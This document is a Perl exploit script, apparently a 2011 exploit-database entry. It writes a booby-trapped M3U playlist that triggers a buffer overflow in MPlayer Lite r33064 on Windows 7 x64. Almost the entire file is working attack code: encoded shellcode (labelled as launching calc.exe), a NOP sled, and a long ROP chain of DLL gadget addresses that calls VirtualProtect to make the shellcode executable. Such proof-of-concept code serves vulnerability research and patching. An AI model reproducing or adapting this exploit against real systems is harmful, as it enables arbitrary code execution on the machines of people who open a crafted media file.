#!/usr/bin/perl
#
# Exploit Title: Mplayer BOF + ROP Exploit
# Date: 04\05\2011
# Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
# Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# Version: Lite 33064
# Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
# CVE : None
use strict;
use warnings;
use IO::File;
print q
{
BOF/ROP exploit created by Nate_M
Now writing M3U file...
};
# windows/exec CMD=calc.exe
# x86/shikata_ga_nai size 227
# badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f'
my $shellcode =
"\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" .
"\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" .
"\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" .
"\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" .
"\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" .
"\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" .
"\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" .
"\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" .
"\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" .
"\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" .
"\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" .
"\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" .
"\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" .
"\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" .
"\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" .
"\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" .
"\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" .
"\xe8\x37\x55";
my $buf = "\x90" x 1000;
$buf .= $shellcode;
$buf .= "\x41" x (2368-length($buf));;
$buf .= "0000"; # VirtualProtect addr
$buf .= "1111"; # Return addr
$buf .= "2222"; # lpAddress
$buf .= "3333"; # dwsize
$buf .= "4444"; # flNewProtect
$buf .= "\x60\x63\x12\x6B"; # lpflOldProtect
$buf .= "\x41" x 76;
##### Begin ROP Chain, create anchor in memory #####
$buf .= pack('V',0x649ABC7B); # PUSH ESP # POP EBX # POP ESI # RET [avformat.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x6B0402A9); # MOV EAX,EBX # POP EBX # RET [avcodec.dll]
$buf .= "\x41" x 4;
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC); # DEC EAX # RET 68 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x6AFA5EE9); # MOV EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
##### Find location of VirtualProtect() in kernel32.dll #####
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 2; # INC EAX # RET 6B [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D6 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET D7 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35C [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 35D [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 6BA [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET D74 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1AE8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 35D0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AF1DCB5); # XCHG EAX,ECX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AE8F378); # MOV EAX,DWORD PTR DS:[EAX] # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 12; # DEC EAX # RET 5D [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 174 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 5D0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET BA0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 1740 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD); # INC EAX # RET 1741 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 2E82 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Find location of shellcode #####
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6B0B79D2); # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C728); # ADD EAX,69 # RET 69 [avcodec.dll]
$buf .= pack('V',0x6AD79CAC) x 31; # DEC EAX # RET 4A [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 94 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 128 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 250 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 4A0 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 940 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD5130E); # SUB EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x649509B4); # XCHG EAX,EBP # RET [avformat.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Find approx length of shellcode #####
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET [avcodec.dll]
##### Set shellcode to read/write #####
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AD9AC5C); # XOR EAX,EAX # RET 0 [avcodec.dll]
$buf .= pack('V',0x6AD5C6FD) x 4; # INC EAX # RET 4 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 8 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 10 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 20 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6B0B4113); # ADD EAX,EDX # RET 40 [avcodec.dll]
$buf .= pack('V',0x6B0B79D0); # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
$buf .= pack('V',0x6AFCD525); # XCHG EAX,ESI # RET [avcodec.dll]
$buf .= pack('V',0x6AE62D12); # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
##### And profit #####
$buf .= pack('V',0x6AD79CAC) x 16; # DEC EAX # RET [avcodec.dll]
$buf .= pack('V',0x6AD44B94); # XCHG EAX,ESP # RET
$buf .= "\x41" x (5172-length($buf));;
$buf .= "\xff\xff\xff\xff";
$buf .= pack('V',0x64953AD6); # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
$buf .= "\x41" x 2000;
open(my $FILE,">Exploit.m3u") || die "**Error:\n$!\n";
print $FILE "http:// ".$buf;
close($FILE);
print "\tFile Created With Sucess\n\n";